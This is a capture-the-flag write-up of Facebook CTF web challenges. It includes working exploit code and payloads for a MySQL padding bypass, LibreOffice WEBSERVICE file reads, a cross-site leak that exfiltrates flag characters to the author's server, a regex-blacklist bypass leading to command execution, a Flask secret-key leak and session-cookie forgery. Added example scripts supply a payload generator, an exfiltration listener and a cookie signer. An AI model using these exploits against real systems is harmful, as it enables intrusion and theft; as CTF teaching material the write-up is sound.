Solving each and every fb-ctf challenge PART 1

Write-up of all the challenges which were in fb-ctf web category

Piyush Raj
Jun 15 · 14 min read
Sad.
No, I found it funny as well :P

Let the hacking begin

From The Social Network

Web :: product manager

Description

Solution

We had the luxury of viewing the source-code for this challenge.

db.php

Vulnerability

All MySQL collations are of type PADSPACE. This means that all CHAR, VARCHAR, and TEXT values in MySQL are compared without regard to any trailing spaces. (MySQL reference manual)

So for a non-binary string column 'abc' = 'abc   ' is true, and code that checks a name exactly on the application side but leaves the equality to the database can be made to treat two different strings as the same one. Caveats a practitioner should keep in mind: binary strings (BINARY, VARBINARY, BLOB) and a BINARY or *_bin comparison keep trailing spaces significant, LIKE does too, and MySQL 8.0's default utf8mb4_0900_ai_ci collation is NO PAD, so the trick depends on the column's collation.
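
As an added example (not from the write-up and not the challenge's db.php), here is the behaviour modelled in Python with sqlite3, where a custom collation imitates MySQL's PAD SPACE rule so the demo runs offline. The table layout, the application-side guard and the sample rows are assumptions for illustration; the MySQL equivalents of the hardened query are given in the comments.

```python
import sqlite3


def mysql_pad_space_cmp(a: str, b: str) -> int:
    """sqlite collation callback that mimics MySQL PAD SPACE: trailing U+0020 is ignored."""
    a, b = a.rstrip(" "), b.rstrip(" ")
    return (a > b) - (a < b)


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_collation("MYSQL_PAD", mysql_pad_space_cmp)
    # the name column gets the PAD SPACE-like collation, as a MySQL VARCHAR column would
    conn.execute("CREATE TABLE products (name TEXT COLLATE MYSQL_PAD, secret TEXT, description TEXT)")
    # constructed sample data: the protected product whose description is the prize
    conn.execute("INSERT INTO products VALUES (?, ?, ?)",
                 ("facebook", "not-known-to-attacker", "flag{constructed}"))
    conn.execute("INSERT INTO products VALUES (?, ?, ?)",
                 ("widget", "hunter2", "an ordinary product"))
    return conn


def app_guard(name: str) -> None:
    """Hypothetical application check, byte-exact like PHP's ===; 'facebook ' passes it."""
    if name == "facebook":
        raise PermissionError("reserved product name")


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    app_guard(name)
    # the column collation decides equality, so 'facebook ' == 'facebook' here
    rows = conn.execute("SELECT description FROM products WHERE name = ?", (name,))
    return [r[0] for r in rows]


def lookup_hardened(conn: sqlite3.Connection, name: str) -> list:
    app_guard(name)
    # force a binary comparison; MySQL: WHERE name = ? COLLATE utf8mb4_bin  (or BINARY name = ?)
    rows = conn.execute("SELECT description FROM products WHERE name = ? COLLATE BINARY", (name,))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "facebook "))   # the trailing space reaches the protected row
    print(lookup_hardened(db, "facebook "))     # []
```

The same mismatch shows up wherever the application compares with one rule and the database with another: a length check or a `TRIM`-on-insert helps, but the reliable fix is to make the database comparison binary (or the column's collation NO PAD) so both sides agree on what "equal" means.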

Exploit!

The password is desc itself
Product has been added
Exploited! non-1337 flag : attacking_sqi_without_injection_is_amazing_:)

Web :: pdfme

Description

Exploring the challenge

Welcome Page

What the hell is .fods?

A .fods file is a flat OpenDocument Spreadsheet: the whole ODS document as one XML file instead of a zip archive, so it can be written and edited by hand (OpenDocument Spreadsheet XML definition).
Generated 1.pdf, yeah Mr. Robot ❤
dirb http://challenges.fbctf.com:8084/
Looking into Metadata
No, it’s not
LibreOffice Security Advisories Page

Try #2:

Success!
Definitely not the way to go.
Wow.
=WEBSERVICE("/home/libreoffice_admin/flag")

LibreOffice's WEBSERVICE() fetches whatever it is pointed at when the sheet is recalculated and returns the response body as the cell's text, so a cell holding this formula pulls the flag file into the spreadsheet and the PDF conversion prints it. Anything that converts untrusted office documents should run with external-content functions like WEBSERVICE disabled and with no access to the host's files or internal network.
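
As an added example (not the author's payload file), a small Python generator for the flat ODS document that carries such a formula, plus a parser to check the file before uploading it. The namespace URIs are the ODF 1.2 ones; the sheet name, the cached cell text and the assumption that the converter recalculates formulas on load are mine.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TABLE_NS = "{urn:oasis:names:tc:opendocument:xmlns:table:1.0}"

# Flat (single-file XML) OpenDocument Spreadsheet skeleton; namespaces per ODF 1.2.
FODS_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
                 xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0"
                 xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
                 office:version="1.2"
                 office:mimetype="application/vnd.oasis.opendocument.spreadsheet">
  <office:body>
    <office:spreadsheet>
      <table:table table:name="Sheet1">
{rows}
      </table:table>
    </office:spreadsheet>
  </office:body>
</office:document>
"""


def webservice_formula(url_or_path: str) -> str:
    """=WEBSERVICE(...) fetches a URL; a local path is accepted too, as the write-up shows."""
    return 'WEBSERVICE("' + url_or_path.replace('"', '""') + '")'


def formula_cell(formula: str) -> str:
    """One row holding one formula cell. ODF stores the formula in table:formula with the of: prefix."""
    attr = escape(formula, {'"': "&quot;"})   # keep the attribute well-formed whatever the formula holds
    return (
        "        <table:table-row>"
        f'<table:table-cell table:formula="of:={attr}" office:value-type="string">'
        "<text:p>pending</text:p>"           # cached value, replaced once the sheet recalculates
        "</table:table-cell></table:table-row>"
    )


def build_fods(formulas) -> str:
    return FODS_TEMPLATE.format(rows="\n".join(formula_cell(f) for f in formulas))


def formulas_in(doc: str) -> list:
    """Parse a .fods back and list its cell formulas (sanity check before uploading)."""
    root = ET.fromstring(doc.encode("utf-8"))
    return [c.get(TABLE_NS + "formula") for c in root.iter(TABLE_NS + "table-cell")]


if __name__ == "__main__":
    with open("leak.fods", "w", encoding="utf-8") as fh:
        fh.write(build_fods([webservice_formula("/home/libreoffice_admin/flag")]))
```

The same cell with an http:// URL turns the converter into an SSRF client against whatever the rendering host can reach, which is the other reason to keep these functions off in server-side conversion.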

Web :: secret note keeper

Welcome Screen
Saving a note named “ping”
<iframe> ❤
And I can access it!

Basic workflow to get the flag (a cross-site leak: the search page embeds an <iframe> only when the query matches a note, and frames.length of a cross-origin frame is readable from our page):

  1. Start a server on port 80, port-forward so that it’s reachable.
  2. Write a python script that solves pow (proof-of-work) and makes a Bug Report submit request to challenges.fbctf.com:8082 with the URL of our server serving the exploit.
  3. Write the main exploit sandwich.
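
Step 1 of that workflow, as an added example that is not the author's script: a minimal Python server that hands the exploit page to the bug-report bot on GET and records the characters the page POSTs back. The exploit page sends them with mode "no-cors", so the body arrives as plain text and the server needs no CORS headers at all. The file name exploit.html and the starting prefix fb{ are assumptions.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

EXPLOIT_PAGE = Path("exploit.html")   # assumed: the HTML/JS that drives the iframe oracle


class LeakState:
    """Keeps the longest flag prefix reported so far; ignores out-of-order or garbled reports."""

    def __init__(self, prefix: str = "fb{"):
        self.prefix = prefix
        self.lock = threading.Lock()

    def record(self, body: str) -> str:
        body = body.strip()
        with self.lock:
            if body.startswith(self.prefix) and len(body) > len(self.prefix):
                self.prefix = body
            return self.prefix


STATE = LeakState()


class LeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # serve the exploit page to whatever follows the URL we put in the bug report
        page = EXPLOIT_PAGE.read_bytes() if EXPLOIT_PAGE.exists() else b"<html></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def do_POST(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        print("leaked so far:", STATE.record(body), flush=True)
        self.send_response(204)   # a no-cors request only needs the connection to complete
        self.end_headers()

    def log_message(self, fmt, *args):   # keep stdout for the leaked data only
        pass


def start_server(host: str = "0.0.0.0", port: int = 80) -> HTTPServer:
    """Run the listener on a background thread; port 0 picks a free port (handy for tests)."""
    srv = HTTPServer((host, port), LeakHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), LeakHandler).serve_forever()
```

Run it where the port-forward lands, point the bug report at http://your-host/ and watch the prefix grow one character per oracle hit.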

Our exploit, the pseudo code from our notes written out as JavaScript:

const target = "http://challenges.fbctf.com:8082/search?query=";
const OUR_SERVER = "http://our.server/";   // the port-80 listener from step 1 (placeholder)
const chars = Array.from({length: 94}, (_, i) => String.fromCharCode(33 + i)); // all printable ASCII
const attr = document.createElement('iframe');
document.body.appendChild(attr);
let known = "fb{";

function exploit(i = 0) {
  if (i >= chars.length) return;                 // no candidate matched: flag complete (or the oracle broke)
  const guess = known + chars[i];
  attr.onload = () => {
    // the search page embeds an <iframe> only when the query matches a note, and
    // frames.length is one of the few properties readable across origins
    if (attr.contentWindow.frames.length != 0) {
      known = guess;
      console.log("leaked data = " + known);
      fetch(OUR_SERVER, { method: "POST", mode: "no-cors", body: known });   // ping our own server with the data
      exploit(0);                                // start over for the next character
    } else {
      exploit(i + 1);                            // try the next candidate
    }
  };
  attr.src = target + encodeURIComponent(guess);
}
exploit();
flag : fb{cr055_s173_l34|<5_4r4_c00ool!!}

web :: rceservice

Description

index.php
works on PHP 7.2
{“cmd” : “ls -la”, “test” : “aaaaaaaaaa …”}
Hacking Attempt detected, Again?
Oops.
putenv('PATH=/home/rceservice/jail');

PATH is pinned to a jail directory, so the command has to spell out absolute paths (/bin/cat). The "Hacking Attempt detected" filter is a preg_match() blacklist: padding the JSON with a one-million-character "test" value makes the regex engine exceed pcre.backtrack_limit, preg_match() then returns false instead of 1, and an if (preg_match(...)) check treats that as "no match". The robust check is preg_match(...) === 1 combined with preg_last_error() === PREG_NO_ERROR, failing closed on any error.

import requests

# the filler pushes the blacklist regex past pcre.backtrack_limit so the command is never rejected
payload = '{"cmd":"cd /home/rceservice/ && /bin/cat flag", "test" : "' + "a" * 1000000 + '"}'
print(requests.post("http://challenges.fbctf.com:8085/", data={"cmd": payload}).text)
w0ot!
Insane!

web :: events

Description

Welcome Page
Hmmm …
Result
Aha!
The injection point evaluates attribute and subscript chains on an SQLAlchemy model object (the _sa_original_init entry below is SQLAlchemy's declarative constructor), so walking from __init__ into its __globals__ reaches the module that created the Flask app, and from there app.config, where SECRET_KEY lives. Note that [app] is unquoted, which is how str.format-style field access spells a dictionary key.

Payload :
__init__.__dict__
Output :
{'_sa_original_init': <function _declarative_constructor at 0x7fb2c3a6f730>}
Payload :
__init__.__globals__
Contents of __globals__
Payload :
__init__.__globals__[app]
Output :
<Flask 'app'>
Payloads :
__init__.__globals__[app].config.__dict__
__init__.__globals__[app].__dict__
Yipee! Finally! or not?
Yay, we have it! ( http://flask.pocoo.org/docs)
For comparison, what tplmap made of the same injection point (it guesses Twig, which is wrong: the target is the Flask app seen above):

Header parameter: Cookie
Engine: Twig
Injection: 1:1})}}*{{1
Context: code
OS: undetected
Technique: blind
Capabilities:
  Shell command execution: no
  Bind and reverse shell: no
  File write: no
  File read: no
  Code evaluation: ok, php code (blind)
flask-unsign --sign --cookie "admin" --secret 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
Cookie, Cookie
wo0t!
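
To make that last step concrete, here is an added Python implementation (not flask-unsign and not the challenge code) of how Flask signs its session cookie: itsdangerous' URLSafeTimedSerializer with Flask's salt "cookie-session", HMAC key derivation and SHA-1. With the leaked SECRET_KEY it forges a cookie the server accepts and verifies one the way the server does. The session contents {"admin": true} are an assumption, since the write-up does not show the real session layout, and timestamps follow itsdangerous 2.x (plain Unix time).

```python
import base64
import binascii
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SECRET_KEY = "fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y"   # leaked via the injection above
SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface.salt


def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret: str) -> bytes:
    # key_derivation="hmac": the signing key is HMAC-SHA1(secret, salt), not the secret itself
    return hmac.new(secret.encode("utf-8"), SALT, hashlib.sha1).digest()


def sign_session(secret: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Produce the value of the 'session' cookie for the given dict."""
    ts = int(time.time()) if timestamp is None else timestamp
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode("utf-8")
    body = _b64e(payload)
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:      # itsdangerous compresses only when it pays off
        body = b"." + _b64e(compressed)
    value = body + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derive_key(secret), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode("ascii")


def verify_session(secret: str, cookie: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the signature (and optional age) checks out, else None."""
    value, _, sig = cookie.encode("ascii", "ignore").rpartition(b".")
    if not value or not sig:
        return None
    try:
        given = _b64d(sig)
    except binascii.Error:
        return None
    expected = hmac.new(_derive_key(secret), value, hashlib.sha1).digest()
    if not hmac.compare_digest(given, expected):
        return None
    body, _, ts_b = value.rpartition(b".")
    if max_age is not None:
        ts = int.from_bytes(_b64d(ts_b), "big")
        if time.time() - ts > max_age:
            return None
    payload = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(payload.decode("utf-8"))


if __name__ == "__main__":
    forged = sign_session(SECRET_KEY, {"admin": True})
    print("Cookie: session=" + forged)
    print(verify_session(SECRET_KEY, forged))
```

The signature covers the exact bytes in the cookie, so the JSON layout does not have to match Flask's serializer byte for byte for the server to accept it; only the key derivation and the salt have to. That is also why the whole session model collapses once SECRET_KEY leaks: rotating the key is the only remediation, and any template or format-string evaluation that can reach app.config is a full compromise of it.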
Moving right along. (Line from The Social Network)

FUN FACT

Moral of the story : One can get 957 pts just for getting lucky!

Or maybe one should try all the l33t credentials if there's common ground. (Sure, you'll learn nothing. No, I don't want that.)

web :: hr_admin_module

Description

Welcome Page

And that's a wrap; keep an eye out for PART 2.

About the Author

Piyush Raj is an 18-year-old college freshman currently working with the OWASP Foundation as a Google Summer of Code student (a GSoCer). He is a past Google Code-In winner and loves playing football.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring

Piyush Raj

Written by

Global Google Code-In Winner🏆. Independent Security Researcher, Developer & Open Source Lover. Have hacked @Motorola, @OnePlus, @Sony, @IIT-B and many others.
